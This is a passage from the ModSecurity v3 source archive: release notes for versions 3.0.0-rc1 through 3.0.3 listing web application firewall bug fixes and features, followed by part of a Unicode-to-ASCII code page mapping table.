@victorhora] v3.0.3 - 2018-Nov-05 -------------------- - Fix double macros bug [Issue #1943 - @supplient, @zimmerle] - Override the default status code if not suitable to redirect action [Issue #1850 - @zimmerle, @victorhora] - parser: Fix the support for CRLF configuration files [Issue #1945 - @zimmerle, @defanator, @kjakub] - Organizes the server logs [0xb7c36 and 0x5ac20 - @zimmerle, @steven-j-wojcik] - m_lineNumber in Rule not mapping with the correct line number in file [Issue #1844 - @zimmerle, @victorhora, @xizeng] - Using shared_ptr instead of unique_ptr on rules exceptions [Issue #1697 - @zimmerle, @brianp9906, @victorhora, @LeSwiss, @defanator] - Changes debuglogs schema to avoid unecessary str allocation [0xb2840 - @zimmerle] - Fix the SecUnicodeMapFile and SecUnicodeCodePage [0x3094d - @zimmerle, @victorhora] - Changes the timing to save the rule message [0xca270 - @zimmerle] - Fix crash in msc_rules_add_file() when using disruptive action in chain [Issue #1849 - @victorhora, @zimmerle, @rperper] - Fix memory leak in AuditLog::init() [Issue #1897 - @weliu] - Fix RulesProperties::appendRules() [Issue #1901 - @steven-j-wojcik] - Fix RULE lookup in chained rules [0x3077c - @zimmerle] - @ipMatch "Could not add entry" on slash/32 notation in 2.9.0 [Issue #849 - @zimmerle, @dune73] - Using values after transformation at MATCHED_VARS [0x14316 - @zimmerle] - Adds support to UpdateActionById. [Issue #1800 - @zimmerle, @victorhora, @NisariAIT] - Add correct C function prototypes for msc_init and msc_create_rule_set [Issue #1922 - @steven-j-wojcik] - Allow LuaJIT 2.1 to be used [Issue #1909 - @victorhora, @mdunc] - Match m_id JSON log with RuleMessage and v2 format [Issue #1185 - @victorhora] - Adds support to setenv action. [Issue #1044 - @zimmerle] - Adds new transaction constructor that accepts the transaction id as parameter. [Issue #1627 - @defanator, @zimmerle] - Adds request IDs and URIs to the debug log [Issue #1627 - @defanator, @zimmerle] - Treating variables exception on load-time instead of run time. [0x028e0 and 0x275a1 - @zimmerle] - Fix: function m.setvar in Lua scripts and add testcases [Issue #1859 - @nowaits, @victorhora] - Fix SecResponseBodyAccess and ctl:requestBodyAccess directives [Issue #1531 - @victorhora, @defanator] - Fix OpenBSD build [Issue #1841 - @victorhora, @zimmerle, @juanfra684] - Fix parser to support GeoLookup with MaxMind [Issue #1884, #1895 - @victorhora, @everping] - parser: Fix simple quote setvar in the end of the line [Issue #1831 - @zimmerle, @csanders-git] - Fix pc file [Issue #1847 - @gquintard] - modsec_rules_check: uses the gnu `.la' instead of `.a' file [Issue #1853 - @ste7677, @victorhora, @zimmerle] - good practices: Initialize variables before use it [Issue #1889 - Marc Stern] - Fix utf-8 character encoding conversion [Issue #1794 - @tinselcity, @zimmerle] - Adds support for ctl:requestBodyProcessor=URLENCODED [Issue #1797 - @victorhora] - Add LUA compatibility for CentOS and try to use LuaJIT first if available [Issue #1622 - @victorhora, @dmitryzykov] - Allow LuaJIT to be used [Issue #1809 - @victorhora, @p0pr0ck5] - Implement support for Lua 5.1 [Issue #1809 - @p0pr0ck5, @victorhora] - Variable names must match fully, not partially. Match should be case insensitive. [Issue #1818, #1820, #1810, #1808 - @michaelgranzow-avi, @victorhora, @theMiddleBlue, @airween, @zimmerle, @LeeShan87] - Improves the performance while loading the rules [Issue #1735 - @zimmerle, @p0pr0ck5, @victorhora] - Allow empty strings to be evaluated by regex::searchAll [Issue #1799, #1785 - @victorhora, @XuanHuyDuong, @zimmerle] - Adds basic pkg-config info [Issue #1790 - @gquintard, @zimmerle] - Fixed LMDB collection errors [Issue #1787 - @airween, @zimmerle] - Fixed false positive MULTIPART_UNMATCHED_BOUNDARY errors [Issue #1747, #1924 - @airween, @victorhora, @defanator, @zimmerle] - Fix ip tree lookup on netmask content [Issue #1793 - @tinselcity, @zimmerle] - Changes the behavior of the default sec actions [Issue #1629 - @mirkodziadzka-avi, @zimmerle, @victorhora] - Refactoring on {global,ip,resources,session,tx,user} collections [Issue #1754, #1778 - @LeeShan87, @zimmerle, @victorhora, @wwd5613, @sobigboy] - Fix race condition in UniqueId::uniqueId() [Issue #1786 - @weliu] - Fix memory leak in error message for msc_rules_merge C APIs [Issue #1765 - @weliu] - Return false in SharedFiles::open() when an error happens [Issue #1783 - @weliu] - Use rvalue reference in ModSecurity::serverLog [Issue #1769 - @weliu] - Build System: Fix when multiple lines for curl version. [Issue #1771 - @Artistan] - Checks if response body inspection is enabled before process it [Issue #1643 - @zoltan-fedor, @dennus, @defanator, @zimmerle] - Code Cleanup. [Issue #1757, #1755, #1756, #1761 - @p0pr0ck5] - Fix setvar parsing of quoted data [Issue #1733, #1759, #1775 - @victorhora, @JaiHarpalani, @defanator] - Fix LDFLAGS for unit tests. [Issue #1758 - @smlx] - Adds time stamp back to the audit logs [Issue #1762 - @Pjack, @zimmerle] - Disables skip counter if debug log is disabled [@zimmerle] - Cosmetics: Represents amount of skipped rules without decimal [Issue #1737 - @p0pr0ck5] - Add missing escapeSeqDecode, urlEncode and trimLeft/Right tfns to parser [Issue #1752 - @victorhora] - Fix STATUS var parsing and accept STATUS_LINE var for v2 backward comp. [Issue #1738 - @victorhora] - Fix memory leak in modsecurity::utils::expandEnv() [Issue #1750 - @defanator] - Initialize m_dtd member in ValidateDTD class as NULL [Issue #1751 - @airween] - Fix broken @detectxss operator regression test case [Issue #1739 - @p0pr0ck5] - Fix utils::string::ssplit() to handle delimiter in the end of string [Issue #1743, #1744 - @defanator] - Fix variable FILES_TMPNAMES [Issue #1646, #1610 - @victorhora, @zimmerle, @defanator] - Fix memory leak in Collections [Issue #1729, #1730 - @defanator] v3.0.2 - 2018-Apr-03 -------------------- - Fix lib version information while generating the .so file [@gl1f1v21, @zimmerle] v3.0.1 - 2018-Apr-02 -------------------- - Adds support for ctl:ruleRemoveByTag [@zimmerle, @weliu] - Fix SecUploadDir configuration merge [Issue #1720 - @zimmerle, @gjvanetten] - Include all prerequisites for "make check" into dist archive [Issue #1716 - @defanator] - Fix: Reverse logic of checking output in @inspectFile [Issue #1715 - @defanator] - Adds support to libMaxMind [Issue #1307 - @zimmerle, @defanator] - Adds capture action to detectXSS [Issue #1698 - @victorhora] - Temporarily accept invalid MULTIPART_SEMICOLON_MISSING operator [Issue #1701 - @victorhora] - Adds capture action to detectSQLi [Issue #1698 - @zimmerle] - Adds capture action to rbl [Issue #1698 - @zimmerle] - Adds capture action to verifyCC [Issue #1698 - @michaelgranzow-avi, @zimmerle] - Adds capture action to verifySSN [Issue #1698 - @zimmerle] - Adds capture action to verifyCPF [Issue #1698 - @zimmerle] - Prettier error messages for unsupported configurations (UX) [@victorhora] - Add missing verify*** transformation statements to parser [Issue #1006 and #1007 - @victorhora] - Fix a set of compilation warnings [Issue #1650 - @zimmerle, @JayCase] - Check for disruptive action on SecDefaultAction. [Issue #1614 - @zimmerle, @michaelgranzow-avi] - Fix block-block infinite loop. [Issue #1614 - @zimmerle, @michaelgranzow-avi] - Correction remove_by_tag and remove_by_msg logic. [Issue #1636 - @Minasu] - Fix LMDB compile error [Issue #1691 - @airween] - Fix msc_who_am_i() to return pointer to a valid C string [Issue #1640 - @defanator] - Added some cosmetics to autoconf related code [Issue #1652 - @airween] - Fix "make dist" target to include necessary headers for Lua [Issue #1678 - @defanator] - Fix "include /foo/*.conf" for single matched object in directory [Issue #1677 - @defanator, @zimmerle] - Add missing Base64 transformation statements to parser [Issue #1632 - @victorhora, @zimmerle] - Fixed resource load on ip match from file [#1674 - @zimmerle, @StefaanSeys] - Fixed examples compilation while using disable-shared [#1670 - @zimmerle, @ivanbaldo] - Fixed compilation issue while xml is disabled [0x243028 - @zimmerle] - Having LDADD and LDFLAGS organized on Makefile.am [0xd0e85e - @zimmerle] - Checking std::deque size before use it [0x217cbf - @zimmerle, Yaron Dayagi] - perf improvement: Added the concept of RunTimeString and removed all run time parser. [0x3eae51 0x0320e0 0xb5688f 0xfe47a9 0xfa9842 0x1affc3 0x079de4 0xc7c04f 0x5262ea 0x01974a 0xd5ee1e - @zimmerle] - perf improvement: Checks debuglog level before format debug msg [0x42ee9 - @zimmerle] - perf. improvement/rx: Only compute dynamic regex in case of macro [0x91ff3 - @zimmerle] - Fix uri on the benchmark utility [0x63bec - @zimmerle] - disable Lua on systems with liblua5.1 [Issue #1639 - @victorhora, @defanator] v3.0.0 - 2017-Dec-13 -------------------- - Improvements on LUA build scripts and support for LUA 5.2. [Issue #1617 and #1622 - @victorhora, @zimmerle] - Fix compilation error with disable_debug_log flag [0xfd84e - Izik Abramov] - Improvements on the benchmark tool. [Issue #1615 - @zimmerle] - Fix lua headers on the build scripts [Issue #1621 - @Minasu] - Refactoring on the JSON parser. [Issue #1576, #1577 - Tobias Gutknecht, @zimmerle, @victorhora, @marcstern] - Adds support to WEBAPPID variable. [Issue #1027 - @zimmerle, @victorhora] - Adds support for SecWebAppId. [Issue #1442 - @zimmerle, @victorhora] - Adds support for SecRuleRemoveByTag. [Issue #1476 - @zimmerle, @victorhora] - Adds support for update target by message. [Issue #1474 - @zimmerle, @victorhora] - Adds support to SecRuleScript directive. [Issue #994 - @zimmerle] - Adds support for the exec action. [Issue #1050 - @zimmerle] - Adds support for transformations inside Lua engine [Issue #994 - @zimmerle] - Adds initial support for Lua engine. [Issue #994 - @zimmerle] - Adds support for @inspectFile operator. [Issue #999 - @zimmerle, @victorhora] - Adds support for RESOURCE variable collection. [Issue #1014 - @zimmerle, @victorhora] - Adds support for @fuzzyHash operator. [Issue #997 - @zimmerle] - Fix build on non x86 arch build [Issue #1598 - @athmane] - Fix memory issue while changing rule target dynamic [Issue #1590 - @zimmerle, @slabber] - Fix log while displaying the name of a dict selection by regex. [@zimmerle] - Setting http response code on the auditlog. [Issue #1592 - @zimmerle] - Refactoring on RuleMessage class, now accepting http code as parameter. [@zimmerle] - Having disruptive msgs as disruptive [instead of warnings] on audit log [Issue #1592 - @zimmerle, @nobodysz] - Parser: Pipes are no longer welcomed inside regex dict element selection. [Issue #1591 - @zimmerle, @slabber] - Avoids unicode initialization on every rules object [Issue #1563 - @zimmerle, @Tiki-God, @sethinsd, @Cloaked9000, @AnoopAlias, @intelbg] - Makes clear to the user whenever the audit log is empty due to missing JSON support. [Issue #1585 - @zimmerle] - Makes auditlog more verbose on debug logs [Issue: #1559 - @zimmerle] - Enable support for AuditLogFormat Issue: #1583, #1493 and #1453 - @victorhora] - Adds macro expansion for @rx operator [Issue: #1528, #1536 - @asterite3, @zimmerle] - Consideres under quoted variable while loading the rules. [Felipe Zimmerle/@zimmerle, Victor Hora/@victorhora] - Store the connection and url parameters in std::string [Issue: #1571 - @majordaw] - Eliminate some reorder and sign warnings [Issue: #1572 - Dávid Major/@majordaw] - Makes parallel logging to work when SELinux is enabled. [Issue: #1562 - David Buckle/@met3or] - Adds possibility to run the pm operator inside a mutex to avoid concurrent access while working on a thread environment. This option is a compilation flag. [Felipe Zimmerle/@zimmerle] v3.0.0-rc1 - 2017-Aug-28 ------------------------ Very first public version. modsecurity-v3.0.4/unicode.mapping0000644000175000017500000014763213607066010017524 0ustar zimmerlezimmerle(MAC - Roman) (MAC - Icelandic) 1250 (ANSI - Central Europe) 00a1:21 00a2:63 00a3:4c 00a5:59 00aa:61 00b2:32 00b3:33 00b9:31 00ba:6f 00bc:31 00bd:31 00be:33 00c0:41 00c3:41 00c5:41 00c6:41 00c8:45 00ca:45 00cc:49 00cf:49 00d1:4e 00d2:4f 00d5:4f 00d8:4f 00d9:55 00db:55 00e0:61 00e3:61 00e5:61 00e6:61 00e8:65 00ea:65 00ec:69 00ef:69 00f1:6e 00f2:6f 00f5:6f 00f8:6f 00f9:75 00fb:75 00ff:79 0100:41 0101:61 0108:43 0109:63 010a:43 010b:63 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0131:69 0134:4a 0135:6a 0136:4b 0137:6b 013b:4c 013c:6c 0145:4e 0146:6e 014c:4f 014d:6f 014e:4f 014f:6f 0152:4f 0153:6f 0156:52 0157:72 015c:53 015d:73 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0178:59 0180:62 0191:46 0192:66 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01b6:7a 01c0:7c 01c3:21 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 0261:67 02b9:27 02ba:22 02bc:27 02c4:5e 02c6:5e 02c8:27 02cb:60 02cd:5f 02dc:7e 0300:60 0302:5e 0303:7e 030e:22 0331:5f 0332:5f 037e:3b 04bb:68 0589:3a 066a:25 2000:20 2001:20 2002:20 2003:20 2004:20 2005:20 2006:20 2010:2d 2011:2d 2032:27 2035:60 203c:21 2044:2f 2074:34 2075:35 2076:36 2077:37 2078:38 2080:30 2081:31 2082:32 2083:33 2084:34 2085:35 2086:36 2087:37 2088:38 2089:39 2102:43 2107:45 210a:67 210b:48 210c:48 210d:48 210e:68 2110:49 2111:49 2112:4c 2113:6c 2115:4e 2118:50 2119:50 211a:51 211b:52 211c:52 211d:52 2124:5a 2128:5a 212a:4b 212c:42 212d:43 212e:65 212f:65 2130:45 2131:46 2133:4d 2134:6f 2191:5e 2194:2d 2195:7c 21a8:7c 2212:2d 2215:2f 2216:5c 2217:2a 221f:4c 2223:7c 2236:3a 223c:7e 2303:5e 2329:3c 232a:3e 2502:2d 250c:2d 2514:4c 2518:2d 251c:2b 2524:2b 252c:54 2534:2b 253c:2b 2550:3d 2554:2d 255a:4c 255d:2d 2566:54 256c:2b 2580:2d 2584:2d 2588:2d 2591:2d 2592:2d 2593:2d 25ac:2d 25b2:5e 25ba:3e 25c4:3c 25cb:30 25d9:30 263c:30 2640:2b 2642:3e 266a:64 266b:64 2758:7c 3000:20 3008:3c 3009:3e 301a:5b 301b:5d ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 1251 (ANSI - Cyrillic) 00c0:41 00c1:41 00c2:41 00c3:41 00c4:41 00c5:41 00c7:43 00c8:45 00c9:45 00ca:45 00cb:45 00cc:49 00cd:49 00ce:49 00cf:49 00d1:4e 00d2:4f 00d3:4f 00d4:4f 00d5:4f 00d6:4f 00d8:4f 00d9:55 00da:55 00db:55 00dc:55 00dd:59 00e0:61 00e1:61 00e2:61 00e3:61 00e4:61 00e5:61 00e7:63 00e8:65 00e9:65 00ea:65 00eb:65 00ec:69 00ed:69 00ee:69 00ef:69 00f1:6e 00f2:6f 00f3:6f 00f4:6f 00f5:6f 00f6:6f 00f8:6f 00f9:75 00fa:75 00fb:75 00fc:75 00fd:79 00ff:79 0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63 010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0110:44 0111:64 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c 0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f 014e:4f 014f:6f 0150:4f 0151:6f 0154:52 0155:72 0156:52 0157:72 0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0160:53 0161:73 0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0178:59 0179:5a 017b:5a 017c:7a 017d:5a 017e:7a 0180:62 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 203c:21 2190:3c 2191:5e 2192:3e 2193:76 2194:2d 221a:76 221f:4c 2500:2d 250c:2d 2514:4c 2518:2d 251c:2b 2524:2b 252c:54 2534:2b 253c:2b 2550:3d 2552:2d 2558:4c 2559:4c 255a:4c 255b:2d 255c:2d 255d:2d 2564:54 2565:54 2566:54 256a:2b 256b:2b 256c:2b 2580:2d 2584:2d 2588:2d 2591:2d 2592:2d 2593:2d 25ac:2d 25b2:5e 25ba:3e 25c4:3c 25cb:30 25d9:30 263a:4f 263b:4f 263c:30 2640:2b 2642:3e 266a:64 266b:64 ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 1252 (ANSI - Latin I) 0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63 010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0111:64 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0131:69 0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c 0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f 014e:4f 014f:6f 0150:4f 0151:6f 0154:52 0155:72 0156:52 0157:72 0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0179:5a 017b:5a 017c:7a 0180:62 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01b6:7a 01c0:7c 01c3:21 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 0261:67 02b9:27 02ba:22 02bc:27 02c4:5e 02c8:27 02cb:60 02cd:5f 0300:60 0302:5e 0303:7e 030e:22 0331:5f 0332:5f 037e:3b 0393:47 0398:54 03a3:53 03a6:46 03a9:4f 03b1:61 03b4:64 03b5:65 03c0:70 03c3:73 03c4:74 03c6:66 04bb:68 0589:3a 066a:25 2000:20 2001:20 2002:20 2003:20 2004:20 2005:20 2006:20 2010:2d 2011:2d 2017:3d 2032:27 2035:60 2044:2f 2074:34 2075:35 2076:36 2077:37 2078:38 207f:6e 2080:30 2081:31 2082:32 2083:33 2084:34 2085:35 2086:36 2087:37 2088:38 2089:39 20a7:50 2102:43 2107:45 210a:67 210b:48 210c:48 210d:48 210e:68 2110:49 2111:49 2112:4c 2113:6c 2115:4e 2118:50 2119:50 211a:51 211b:52 211c:52 211d:52 2124:5a 2128:5a 212a:4b 212c:42 212d:43 212e:65 212f:65 2130:45 2131:46 2133:4d 2134:6f 2212:2d 2215:2f 2216:5c 2217:2a 221a:76 221e:38 2223:7c 2229:6e 2236:3a 223c:7e 2261:3d 2264:3d 2265:3d 2303:5e 2320:28 2321:29 2329:3c 232a:3e 2500:2d 250c:2b 2510:2b 2514:2b 2518:2b 251c:2b 252c:2d 2534:2d 253c:2b 2550:2d 2552:2b 2553:2b 2554:2b 2555:2b 2556:2b 2557:2b 2558:2b 2559:2b 255a:2b 255b:2b 255c:2b 255d:2b 2564:2d 2565:2d 2566:2d 2567:2d 2568:2d 2569:2d 256a:2b 256b:2b 256c:2b 2584:5f 2758:7c 3000:20 3008:3c 3009:3e 301a:5b 301b:5d ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 1253 (ANSI - Greek) 00b4:2f 00c0:41 00c1:41 00c2:41 00c3:41 00c4:41 00c5:41 00c7:43 00c8:45 00c9:45 00ca:45 00cb:45 00cc:49 00cd:49 00ce:49 00cf:49 00d1:4e 00d2:4f 00d3:4f 00d4:4f 00d5:4f 00d6:4f 00d8:4f 00d9:55 00da:55 00db:55 00dc:55 00dd:59 00e0:61 00e1:61 00e2:61 00e3:61 00e4:61 00e5:61 00e7:63 00e8:65 00e9:65 00ea:65 00eb:65 00ec:69 00ed:69 00ee:69 00ef:69 00f1:6e 00f2:6f 00f3:6f 00f4:6f 00f5:6f 00f6:6f 00f8:6f 00f9:75 00fa:75 00fb:75 00fc:75 00fd:79 00ff:79 0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63 010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0110:44 0111:64 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c 0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f 014e:4f 014f:6f 0150:4f 0151:6f 0154:52 0155:72 0156:52 0157:72 0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0160:53 0161:73 0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0178:59 0179:5a 017b:5a 017c:7a 017d:5a 017e:7a 0180:62 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 037e:3b 203c:21 2190:3c 2191:5e 2192:3e 2193:76 2194:2d 221f:4c 2500:2d 250c:2d 2514:4c 2518:2d 251c:2b 2524:2b 252c:54 2534:2b 253c:2b 2550:3d 2554:2d 255a:4c 255d:2d 2566:54 256c:2b 2580:2d 2584:2d 2588:2d 2591:2d 2592:2d 2593:2d 25ac:2d 25b2:5e 25ba:3e 25c4:3c 25cb:30 25d9:30 263a:4f 263b:4f 263c:30 2640:2b 2642:3e 266a:64 266b:64 ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 1254 (ANSI - Turkish) 00dd:59 00fd:79 0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63 010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0110:44 0111:64 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c 0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f 014e:4f 014f:6f 0150:4f 0151:6f 0154:52 0155:72 0156:52 0157:72 0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0179:5a 017b:5a 017c:7a 017d:5a 017e:7a 0180:62 0189:44 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01b6:7a 01c0:7c 01c3:21 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 